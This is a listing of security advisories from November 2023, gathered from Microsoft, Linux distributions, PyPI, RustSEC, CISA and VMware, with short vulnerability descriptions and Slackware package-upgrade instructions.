10.11.2023 00:35:37 | msrc | [MS:CVE-2023-5996] Chromium: CVE-2023-5996 Use after free in WebAudio | | https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-5996
09.11.2023 10:00:00 | msrc | [MS:CVE-2023-36024] Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability (important) | | https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36024
09.11.2023 10:00:00 | msrc | [MS:CVE-2023-36014] Microsoft Edge (Chromium-based) Remote Code Execution Vulnerability (moderate) | | https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36014
09.11.2023 14:47:44 | almalinux | [ALSA-2023:6267] squid:4 security update (critical) | squid:4 security update | https://secdb.nttzen.cloud/security-advisory/detail/ALSA-2023:6267
09.11.2023 08:18:48 | almalinux | [ALSA-2023:6247] .NET 7.0 security update (moderate) | .NET 7.0 security update | https://secdb.nttzen.cloud/security-advisory/detail/ALSA-2023:6247
09.11.2023 08:31:53 | almalinux | [ALSA-2023:6187] firefox security update (important) | firefox security update | https://secdb.nttzen.cloud/security-advisory/detail/ALSA-2023:6187
10.11.2023 10:00:00 | msrc | [MS:CVE-2023-36027] Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability (important) | | https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36027
10.11.2023 09:21:53 | almalinux | [ALSA-2023:6194] thunderbird security update (important) | thunderbird security update | https://secdb.nttzen.cloud/security-advisory/detail/ALSA-2023:6194
10.11.2023 19:15:35 | suse | [SUSE-SU-2023:4415-1] Security update for clamav (important) | Security update for clamav | https://secdb.nttzen.cloud/security-advisory/detail/SUSE-SU-2023:4415-1
10.11.2023 19:12:52 | suse | [SUSE-SU-2023:4414-1] Security update for the Linux Kernel (important) | Security update for the Linux Kernel | https://secdb.nttzen.cloud/security-advisory/detail/SUSE-SU-2023:4414-1
10.11.2023 12:25:47 | ubuntu | [USN-6465-3] Linux kernel (GKE) vulnerabilities | Several security issues were fixed in the Linux kernel. | https://secdb.nttzen.cloud/security-advisory/detail/USN-6465-3
10.11.2023 12:16:47 | ubuntu | [USN-6462-2] Linux kernel (IoT) vulnerabilities | Several security issues were fixed in the Linux kernel. | https://secdb.nttzen.cloud/security-advisory/detail/USN-6462-2
10.11.2023 10:36:40 | opensuse | [openSUSE-SU-2023:0361-1] Security update for tor (moderate) | Security update for tor | https://secdb.nttzen.cloud/security-advisory/detail/openSUSE-SU-2023:0361-1
11.11.2023 16:59:01 | rustsec | [RUSTSEC-2023-0070] Insufficient covariance check makes self_cell unsound | All public versions prior to `1.02` used an insufficient check to ensure that users correctly marked the dependent type as either `covariant` or `not_covariant`. This allowed users to mark a dependent as covariant even though its type was not covariant but invariant, for certain invariant types involving trait object lifetimes. One example for such a dependent type is `type Dependent<'a> = RefCell<Box<dyn fmt::Display + 'a>>`. Such a type allowed unsound usage in purely safe user code that leads to undefined behavior. The patched versions now produce a compile time error if such a type is marked as `covariant`. | https://secdb.nttzen.cloud/security-advisory/detail/RUSTSEC-2023-0070
12.11.2023 18:29:15 | pypi | [PYSEC-2023-231] apache-airflow vulnerability | Apache Airflow, versions before 2.7.3, has a vulnerability that allows an authorized user who has access to read specific DAGs only, to read information about task instances in other DAGs. This is a different issue than CVE-2023-42663 but leads to a similar outcome. Users of Apache Airflow are advised to upgrade to version 2.7.3 or newer to mitigate the risk associated with this vulnerability. | https://secdb.nttzen.cloud/security-advisory/detail/PYSEC-2023-231
12.11.2023 18:29:15 | pypi | [PYSEC-2023-232] apache-airflow vulnerability | We failed to apply CVE-2023-40611 in 2.7.1 and this vulnerability was marked as fixed then. Apache Airflow, versions before 2.7.3, is affected by a vulnerability that allows authenticated and DAG-view authorized Users to modify some DAG run detail values when submitting notes. This could have them alter details such as configuration parameters, start date, etc. Users should upgrade to version 2.7.3 or later which has removed the vulnerability. | https://secdb.nttzen.cloud/security-advisory/detail/PYSEC-2023-232
13.11.2023 21:27:10 | slackware | [SSA:2023-317-01] tigervnc | New tigervnc packages are available for Slackware 15.0 and -current to fix security issues. **Here are the details from the Slackware 15.0 ChangeLog** ```extra/tigervnc/tigervnc-1.12.0-i586-4_slack15.0.txz: Rebuilt. Recompiled against xorg-server-1.20.14, including patches for several security issues. Thanks to marav. For more information, see: https://www.cve.org/CVERecord?id=CVE-2022-3550 https://www.cve.org/CVERecord?id=CVE-2022-3551 https://www.cve.org/CVERecord?id=CVE-2022-3553 https://www.cve.org/CVERecord?id=CVE-2022-4283 https://www.cve.org/CVERecord?id=CVE-2022-46340 https://www.cve.org/CVERecord?id=CVE-2022-46341 https://www.cve.org/CVERecord?id=CVE-2022-46342 https://www.cve.org/CVERecord?id=CVE-2022-46343 https://www.cve.org/CVERecord?id=CVE-2022-46344 https://www.cve.org/CVERecord?id=CVE-2023-0494 https://www.cve.org/CVERecord?id=CVE-2023-1393 https://www.cve.org/CVERecord?id=CVE-2023-5367 https://www.cve.org/CVERecord?id=CVE-2023-5380 (* Security fix *)``` **Where to find the new packages** Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-) Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you. Updated package for Slackware 15.0: ftp://ftp.slackware.com/pub/slackware/slackware-15.0/extra/tigervnc/tigervnc-1.12.0-i586-4_slack15.0.txz Updated package for Slackware x86_64 15.0: ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/extra/tigervnc/tigervnc-1.12.0-x86_64-4_slack15.0.txz Updated package for Slackware -current: ftp://ftp.slackware.com/pub/slackware/slackware-current/extra/tigervnc/tigervnc-1.13.1-i586-2.txz Updated packages for Slackware x86_64 -current: ftp://ftp.slackware.com/pub/slackware/slackware64-current/extra/tigervnc/tigervnc-1.13.1-x86_64-2.txz **MD5 signatures** Slackware 15.0 package: 6cdaa7fbfc1f746d489ad8e1cc450df0 tigervnc-1.12.0-i586-4_slack15.0.txz Slackware x86_64 15.0 package: 24d9849bbbd851f5c3f4a5da4f872668 tigervnc-1.12.0-x86_64-4_slack15.0.txz Slackware -current package: c8028eaff3f7053f900d840f0943b06a tigervnc-1.13.1-i586-2.txz Slackware x86_64 -current package: 52cdcf1c405f094ce9a2d2482ca06a38 tigervnc-1.13.1-x86_64-2.txz **Installation instructions** Upgrade the package as root: `# upgradepkg tigervnc-1.12.0-i586-4_slack15.0.txz` | https://secdb.nttzen.cloud/security-advisory/detail/SSA:2023-317-01
13.11.2023 17:26:54 | ubuntu | [USN-6476-1] Memcached vulnerabilities | Several security issues were fixed in memcached. | https://secdb.nttzen.cloud/security-advisory/detail/USN-6476-1
13.11.2023 17:04:17 | ubuntu | [USN-6475-1] Cobbler vulnerabilities | Several security issues were fixed in Cobbler. | https://secdb.nttzen.cloud/security-advisory/detail/USN-6475-1
15.11.2023 00:15:29 | ubuntu | [USN-6479-1] Linux kernel (OEM) vulnerabilities | Several security issues were fixed in the Linux kernel. | https://secdb.nttzen.cloud/security-advisory/detail/USN-6479-1
14.11.2023 23:30:56 | slackware | [SSA:2023-318-01] mariadb | New mariadb packages are available for Slackware 15.0 and -current to fix a security issue. **Here are the details from the Slackware 15.0 ChangeLog** ```patches/packages/mariadb-10.5.23-i586-1_slack15.0.txz: Upgraded. This update fixes bugs and a security issue: Vulnerability allows high privileged attacker with network access via multiple protocols to compromise the server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash. For more information, see: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22084 (* Security fix *)``` **Where to find the new packages** Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-) Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you. Updated package for Slackware 15.0: ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/mariadb-10.5.23-i586-1_slack15.0.txz Updated package for Slackware x86_64 15.0: ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/mariadb-10.5.23-x86_64-1_slack15.0.txz Updated package for Slackware -current: ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/ap/mariadb-10.11.5-i586-1.txz Updated package for Slackware x86_64 -current: ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/ap/mariadb-10.11.6-x86_64-1.txz **MD5 signatures** Slackware 15.0 package: 82195d80fd47e92a363de02bd73f2778 mariadb-10.5.23-i586-1_slack15.0.txz Slackware x86_64 15.0 package: 82d1585d0c51add5b732d41877a97174 mariadb-10.5.23-x86_64-1_slack15.0.txz Slackware -current package: 70dbbc338fcff0e18fee0efbb797727c ap/mariadb-10.11.5-i586-1.txz Slackware x86_64 -current package: 089f5e1b4ec9be1f1bf763e14d129448 ap/mariadb-10.11.6-x86_64-1.txz **Installation instructions** Upgrade the package as root: `# upgradepkg mariadb-10.5.23-i586-1_slack15.0.txz` Then, restart the database server: `# sh /etc/rc.d/rc.mysqld restart` | https://secdb.nttzen.cloud/security-advisory/detail/SSA:2023-318-01
14.11.2023 12:43:25 | ubuntu | [USN-6478-1] Traceroute vulnerability | Traceroute could be made to execute arbitrary commands. | https://secdb.nttzen.cloud/security-advisory/detail/USN-6478-1
14.11.2023 11:44:00 | ubuntu | [USN-6477-1] procps-ng vulnerability | procps-ng could be made to crash if it received specially crafted input. | https://secdb.nttzen.cloud/security-advisory/detail/USN-6477-1
14.11.2023 10:00:00 | msrc | [MS:CVE-2023-38151] Microsoft Host Integration Server 2020 Remote Code Execution Vulnerability (important) | | https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-38151
14.11.2023 10:00:00 | msrc | [MS:CVE-2023-36719] Microsoft Speech Application Programming Interface (SAPI) Elevation of Privilege Vulnerability (important) | | https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36719
14.11.2023 10:00:00 | msrc | [MS:CVE-2023-36705] Windows Installer Elevation of Privilege Vulnerability (important) | | https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36705
14.11.2023 10:00:00 | msrc | [MS:CVE-2023-36560] ASP.NET Security Feature Bypass Vulnerability (important) | | https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36560
14.11.2023 10:00:00 | msrc | [MS:CVE-2023-36437] Azure DevOps Server Remote Code Execution Vulnerability (important) | | https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36437
14.11.2023 10:00:00 | msrc | [MS:CVE-2023-36428] Microsoft Local Security Authority Subsystem Service Information Disclosure Vulnerability (important) | | https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36428
14.11.2023 10:00:00 | msrc | [MS:CVE-2023-36427] Windows Hyper-V Elevation of Privilege Vulnerability (important) | | https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36427
14.11.2023 10:00:00 | msrc | [MS:CVE-2023-36425] Windows Distributed File System (DFS) Remote Code Execution Vulnerability (important) | | https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36425
14.11.2023 10:00:00 | msrc | [MS:CVE-2023-36424] Windows Common Log File System Driver Elevation of Privilege Vulnerability (important) | | https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36424
14.11.2023 10:00:00 | msrc | [MS:CVE-2023-36423] Microsoft Remote Registry Service Remote Code Execution Vulnerability (important) | | https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36423
14.11.2023 10:00:00 | msrc | [MS:CVE-2023-36422] Microsoft Windows Defender Elevation of Privilege Vulnerability (important) | | https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36422
14.11.2023 10:00:00 | msrc | [MS:CVE-2023-36413] Microsoft Office Security Feature Bypass Vulnerability (important) | | https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36413
14.11.2023 10:00:00 | msrc | [MS:CVE-2023-36410] Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability (important) | | https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36410
14.11.2023 10:00:00 | msrc | [MS:CVE-2023-36052] Azure CLI REST Command Information Disclosure Vulnerability (critical) | | https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36052
14.11.2023 10:00:00 | msrc | [MS:CVE-2023-36043] Open Management Infrastructure Information Disclosure Vulnerability (important) | | https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36043
14.11.2023 10:00:00 | msrc | [MS:CVE-2023-36036] Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability (important) | | https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36036
14.11.2023 10:00:00 | msrc | [MS:CVE-2023-36017] Windows Scripting Engine Memory Corruption Vulnerability (important) | | https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36017
14.11.2023 10:00:00 | msrc | [MS:CVE-2023-36007] Microsoft Send Customer Voice survey from Dynamics 365 Spoofing Vulnerability (important) | | https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36007
14.11.2023 10:00:00 | msrc | [MS:CVE-2023-38177] Microsoft SharePoint Server Remote Code Execution Vulnerability (important) | | https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-38177
14.11.2023 10:00:00 | msrc | [MS:CVE-2023-36558] ASP.NET Core - Security Feature Bypass Vulnerability (important) | | https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36558
14.11.2023 10:00:00 | msrc | [MS:CVE-2023-36439] Microsoft Exchange Server Remote Code Execution Vulnerability (important) | | https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36439
14.11.2023 10:00:00 | msrc | [MS:CVE-2023-36408] Windows Hyper-V Elevation of Privilege Vulnerability (important) | | https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36408
14.11.2023 10:00:00 | msrc | [MS:CVE-2023-36407] Windows Hyper-V Elevation of Privilege Vulnerability (important) | | https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36407
14.11.2023 10:00:00 | msrc | [MS:CVE-2023-36406] Windows Hyper-V Information Disclosure Vulnerability (important) | | https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36406
14.11.2023 10:00:00 | msrc | [MS:CVE-2023-36405] Windows Kernel Elevation of Privilege Vulnerability (important) | | https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36405
14.11.2023 10:00:00 | msrc | [MS:CVE-2023-36404] Windows Kernel Information Disclosure Vulnerability (important) | | https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36404
14.11.2023 10:00:00 | msrc | [MS:CVE-2023-36403] Windows Kernel Elevation of Privilege Vulnerability (important) | | https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36403
14.11.2023 10:00:00 | msrc | [MS:CVE-2023-36402] Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability (important) | | https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36402
14.11.2023 10:00:00 | msrc | [MS:CVE-2023-36401] Microsoft Remote Registry Service Remote Code Execution Vulnerability (important) | | https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36401
14.11.2023 10:00:00 | msrc | [MS:CVE-2023-36400] Windows HMAC Key Derivation Elevation of Privilege Vulnerability (critical) | | https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36400
14.11.2023 10:00:00 | msrc | [MS:CVE-2023-36399] Windows Storage Elevation of Privilege Vulnerability (important) | | https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36399
14.11.2023 10:00:00 | msrc | [MS:CVE-2023-36398] Windows NTFS Information Disclosure Vulnerability (important) | | https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36398
14.11.2023 10:00:00 | msrc | [MS:CVE-2023-36397] Windows Pragmatic General Multicast (PGM) Remote Code Execution Vulnerability (critical) | | https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36397
14.11.2023 10:00:00 | msrc | [MS:CVE-2023-36396] Windows Compressed Folder Remote Code Execution Vulnerability (important) | | https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36396
14.11.2023 10:00:00 | msrc | [MS:CVE-2023-36395] Windows Deployment Services Denial of Service Vulnerability (important) | | https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36395
14.11.2023 10:00:00 | msrc | [MS:CVE-2023-36394] Windows Search Service Elevation of Privilege Vulnerability (important) | | https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36394
14.11.2023 10:00:00 | msrc | [MS:CVE-2023-36393] Windows User Interface Application Core Remote Code Execution Vulnerability (important) | | https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36393
14.11.2023 10:00:00 | msrc | [MS:CVE-2023-36392] DHCP Server Service Denial of Service Vulnerability (important) | | https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36392
14.11.2023 10:00:00 | msrc | [MS:CVE-2023-36046] Windows Authentication Denial of Service Vulnerability (important) | | https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36046
14.11.2023 10:00:00 | msrc | [MS:CVE-2023-36047] Windows Authentication Elevation of Privilege Vulnerability (important) | | https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36047
14.11.2023 10:00:00 | msrc | [MS:CVE-2023-36049] .NET, .NET Framework, and Visual Studio Elevation of Privilege Vulnerability (important) | | https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36049
14.11.2023 10:00:00 | msrc | [MS:CVE-2023-24023] Mitre: CVE-2023-24023 Bluetooth Vulnerability (important) | | https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-24023
14.11.2023 10:00:00 | msrc | [MS:CVE-2023-36050] Microsoft Exchange Server Spoofing Vulnerability (important) | | https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36050
14.11.2023 10:00:00 | msrc | [MS:CVE-2023-36039] Microsoft Exchange Server Spoofing Vulnerability (important) | | https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36039
14.11.2023 10:00:00 | msrc | [MS:CVE-2023-36041] Microsoft Excel Remote Code Execution Vulnerability (important) | | https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36041
14.11.2023 10:00:00 | msrc | [MS:CVE-2023-36042] Visual Studio Denial of Service Vulnerability (important) | | https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36042
14.11.2023 10:00:00 | msrc | [MS:CVE-2023-36045] Microsoft Office Graphics Remote Code Execution Vulnerability (important) | | https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36045
14.11.2023 10:00:00 | msrc | [MS:CVE-2023-36037] Microsoft Excel Security Feature Bypass Vulnerability (important) | | https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36037
14.11.2023 10:00:00 | msrc | [MS:CVE-2023-36038] ASP.NET Core Denial of Service Vulnerability (important) | | https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36038
14.11.2023 10:00:00 | msrc | [MS:CVE-2023-36035] Microsoft Exchange Server Spoofing Vulnerability (important) | | https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36035
14.11.2023 10:00:00 | msrc | [MS:CVE-2023-36028] Microsoft Protected Extensible Authentication Protocol (PEAP) Remote Code Execution Vulnerability (important) | | https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36028
14.11.2023 10:00:00 | msrc | [MS:CVE-2023-36030] Microsoft Dynamics 365 Sales Spoofing Vulnerability (important) | | https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36030
14.11.2023 10:00:00 | msrc | [MS:CVE-2023-36031] Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability (important) | | https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36031
14.11.2023 10:00:00 | msrc | [MS:CVE-2023-36033] Windows DWM Core Library Elevation of Privilege Vulnerability (important) | | https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36033
14.11.2023 10:00:00 | msrc | [MS:CVE-2023-36021] Microsoft On-Prem Data Gateway Security Feature Bypass Vulnerability (important) | | https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36021
14.11.2023 10:00:00 | msrc | [MS:CVE-2023-36025] Windows SmartScreen Security Feature Bypass Vulnerability (important) | | https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36025
14.11.2023 10:00:00 | msrc | [MS:CVE-2023-36016] Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability (important) | | https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36016
14.11.2023 10:00:00 | msrc | [MS:CVE-2023-36018] Visual Studio Code Jupyter Extension Spoofing Vulnerability (important) | | https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36018
14.11.2023 06:26:40 | ubuntu | [USN-6456-2] Firefox regressions | USN-6456-1 caused some minor regressions in Firefox. | https://secdb.nttzen.cloud/security-advisory/detail/USN-6456-2
14.11.2023 02:00:00 | cisa | [CISA-2023:1114] CISA Adds 3 Known Exploited Vulnerabilities to Catalog | CISA has added 3 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise. | https://secdb.nttzen.cloud/security-advisory/detail/CISA-2023:1114
14.11.2023 02:00:00 | vmware | [VMSA-2023-0026] VMware Cloud Director Appliance contains an authentication bypass vulnerability (CVE-2023-34060). (critical) | | https://secdb.nttzen.cloud/security-advisory/detail/VMSA-2023-0026
14.11.2023 22:22:43 | pypi | [PYSEC-2023-233] exiv2 vulnerability | Exiv2 is a C++ library and a command-line utility to read, write, delete and modify Exif, IPTC, XMP and ICC image metadata. An out-of-bounds write was found in Exiv2 version v0.28.0. The vulnerable function, `BmffImage::brotliUncompress`, is new in v0.28.0, so earlier versions of Exiv2 are _not_ affected. The out-of-bounds write is triggered when Exiv2 is used to read the metadata of a crafted image file. An attacker could potentially exploit the vulnerability to gain code execution, if they can trick the victim into running Exiv2 on a crafted image file. This bug is fixed in version v0.28.1. Users are advised to upgrade. There are no known workarounds for this vulnerability. | https://secdb.nttzen.cloud/security-advisory/detail/PYSEC-2023-233
15.11.2023 16:51:43 | ubuntu | [USN-6480-1] .NET vulnerabilities | Several security issues were fixed in .NET. | https://secdb.nttzen.cloud/security-advisory/detail/USN-6480-1
15.11.2023 16:31:49 | ubuntu | [USN-6483-1] HTML Tidy vulnerability | tidy-html5 could be made to crash or run programs if it opened a specially crafted file. | https://secdb.nttzen.cloud/security-advisory/detail/USN-6483-1
15.11.2023 16:24:42 | ubuntu | [USN-6482-1] Quagga vulnerabilities | Quagga could be made to crash if it received specially crafted network traffic. | https://secdb.nttzen.cloud/security-advisory/detail/USN-6482-1
15.11.2023 16:20:35 | ubuntu | [USN-6481-1] FRR vulnerabilities | FRR could be made to crash if it received specially crafted network traffic. | https://secdb.nttzen.cloud/security-advisory/detail/USN-6481-1
15.11.2023 13:27:24 | ubuntu | [USN-6473-2] pip vulnerabilities | Several security issues were fixed in pip. | https://secdb.nttzen.cloud/security-advisory/detail/USN-6473-2
15.11.2023 11:38:15 | ubuntu | [USN-6449-2] FFmpeg regression | USN-6449-1 introduced a regression in FFmpeg. | https://secdb.nttzen.cloud/security-advisory/detail/USN-6449-2
15.11.2023 02:15:09 | alpinelinux | [ALPINE:CVE-2023-46121] yt-dlp vulnerability | [From CVE-2023-46121] yt-dlp is a youtube-dl fork with additional features and fixes. The Generic Extractor in yt-dlp is vulnerable to an attacker setting an arbitrary proxy for a request to an arbitrary url, allowing the attacker to MITM the request made from yt-dlp's HTTP session. This could lead to cookie exfiltration in some cases. Version 2023.11.14 removed the ability to smuggle `http_headers` to the Generic extractor, as well as other extractors that use the same pattern. Users are advised to upgrade. Users unable to upgrade should disable the Generic extractor (or only pass trusted sites with trusted content) and take caution when using `--no-check-certificate`. | https://secdb.nttzen.cloud/security-advisory/detail/ALPINE:CVE-2023-46121
15.11.2023 17:26:09 | pypi | [PYSEC-2023-234] esptool vulnerability | An issue discovered in esptool 4.6.2 allows attackers to view sensitive information via a weak cryptographic algorithm. | https://secdb.nttzen.cloud/security-advisory/detail/PYSEC-2023-234
15.11.2023 13:44:56 | almalinux | [ALSA-2023:6667] samba security, bug fix, and enhancement update (moderate) | samba security, bug fix, and enhancement update | https://secdb.nttzen.cloud/security-advisory/detail/ALSA-2023:6667
15.11.2023 13:24:09 | almalinux | [ALSA-2023:6679] curl security update (moderate) | curl security update | https://secdb.nttzen.cloud/security-advisory/detail/ALSA-2023:6679
15.11.2023 14:25:06 | almalinux | [ALSA-2023:6368] qemu-kvm security, bug fix, and enhancement update (moderate) | qemu-kvm security, bug fix, and enhancement update | https://secdb.nttzen.cloud/security-advisory/detail/ALSA-2023:6368
15.11.2023 14:07:52 | almalinux | [ALSA-2023:6544] ghostscript security and bug fix update (moderate) | ghostscript security and bug fix update | https://secdb.nttzen.cloud/security-advisory/detail/ALSA-2023:6544
15.11.2023 14:35:32 | almalinux | [ALSA-2023:6330] edk2 security, bug fix, and enhancement update (moderate) | edk2 security, bug fix, and enhancement update | https://secdb.nttzen.cloud/security-advisory/detail/ALSA-2023:6330
17.11.2023 09:05:47 | suse | [SUSE-SU-2023:4476-1] Security update for xen (important) | Security update for xen | https://secdb.nttzen.cloud/security-advisory/detail/SUSE-SU-2023:4476-1
17.11.2023 09:05:29 | suse | [SUSE-SU-2023:4475-1] Security update for xen (important) | Security update for xen | https://secdb.nttzen.cloud/security-advisory/detail/SUSE-SU-2023:4475-1
17.11.2023 06:42:07 | suse | [SUSE-SU-2023:4473-1] Security update for frr (moderate) | Security update for frr | https://secdb.nttzen.cloud/security-advisory/detail/SUSE-SU-2023:4473-1
19.11.2023 12:15:49 | alpinelinux | [ALPINE:CVE-2023-5341] imagemagick vulnerability | [From CVE-2023-5341] A heap use-after-free flaw was found in coders/bmp.c in ImageMagick. | https://secdb.nttzen.cloud/security-advisory/detail/ALPINE:CVE-2023-5341
18.11.2023 21:00:58 | opensuse | [openSUSE-SU-2023:0374-1] Security update for yt-dlp (moderate) | Security update for yt-dlp | https://secdb.nttzen.cloud/security-advisory/detail/openSUSE-SU-2023:0374-1
20.11.2023 18:04:07 | ubuntu | [USN-6489-1] Tang vulnerability | Tang could allow unintended access to secret keys. | https://secdb.nttzen.cloud/security-advisory/detail/USN-6489-1
20.11.2023 17:59:27 | ubuntu | [USN-6490-1] WebKitGTK vulnerabilities | Several security issues were fixed in WebKitGTK. | https://secdb.nttzen.cloud/security-advisory/detail/USN-6490-1
20.11.2023 17:46:14 | ubuntu | [USN-6488-1] strongSwan vulnerability | strongSwan could be made to crash or run programs if it received specially crafted network traffic. | https://secdb.nttzen.cloud/security-advisory/detail/USN-6488-1
20.11.2023 17:29:03 | ubuntu | [USN-6487-1] Avahi vulnerabilities | Avahi could be made to crash if it received specially crafted input. | https://secdb.nttzen.cloud/security-advisory/detail/USN-6487-1
20.11.2023 12:15:05 | ubuntu | [USN-6486-1] iniParser vulnerability | Iniparser could be made to crash if it received a specially crafted file. | https://secdb.nttzen.cloud/security-advisory/detail/USN-6486-1
20.11.2023 13:21:41 | pypi | [PYSEC-2023-240] apache-submarine vulnerability | Apache Software Foundation Apache Submarine has a bug when serializing against yaml. The bug is caused by snakeyaml https://nvd.nist.gov/vuln/detail/CVE-2022-1471. Apache Submarine uses JAXRS to define REST endpoints. In order to handle YAML requests (using application/yaml content-type), it defines a YamlEntityProvider entity provider that will process all incoming YAML requests. In order to unmarshal the request, the readFrom method is invoked, passing the entityStream containing the user-supplied data in `submarine-server/server-core/src/main/java/org/apache/submarine/server/utils/YamlUtils.java`. We have now fixed this issue in the new version by replacing it with `jackson-dataformat-yaml`. This issue affects Apache Submarine: from 0.7.0 before 0.8.0. Users are recommended to upgrade to version 0.8.0, which fixes this issue. If using a version older than 0.8.0 and you do not want to upgrade, you can try cherry-picking PR https://github.com/apache/submarine/pull/1054 and rebuilding the submarine-server image to fix this. | https://secdb.nttzen.cloud/security-advisory/detail/PYSEC-2023-240
20.11.2023 11:25:38 | pypi | [PYSEC-2023-239] asyncssh vulnerability | An issue in AsyncSSH v2.14.0 and earlier allows attackers to control the remote end of an SSH client session via packet injection/removal and shell emulation. | https://secdb.nttzen.cloud/security-advisory/detail/PYSEC-2023-239
20.11.2023 23:22:06 | pypi | [PYSEC-2023-241] piccolo vulnerability | Piccolo is an object-relational mapping and query builder which supports asyncio. Prior to version 1.1.1, the handling of named transaction `savepoints` in all database implementations is vulnerable to SQL Injection via f-strings. While the likelihood of an end developer exposing a `savepoints` `name` parameter to a user is highly unlikely, it would not be unheard of. If a malicious user was able to abuse this functionality they would have essentially direct access to the database and the ability to modify data to the level of permissions associated with the database user. A non-exhaustive list of actions possible based on database permissions is: read all data stored in the database, including usernames and password hashes; insert arbitrary data into the database, including modifying existing records; and gain a shell on the underlying server. Version 1.1.1 fixes this issue. | https://secdb.nttzen.cloud/security-advisory/detail/PYSEC-2023-241
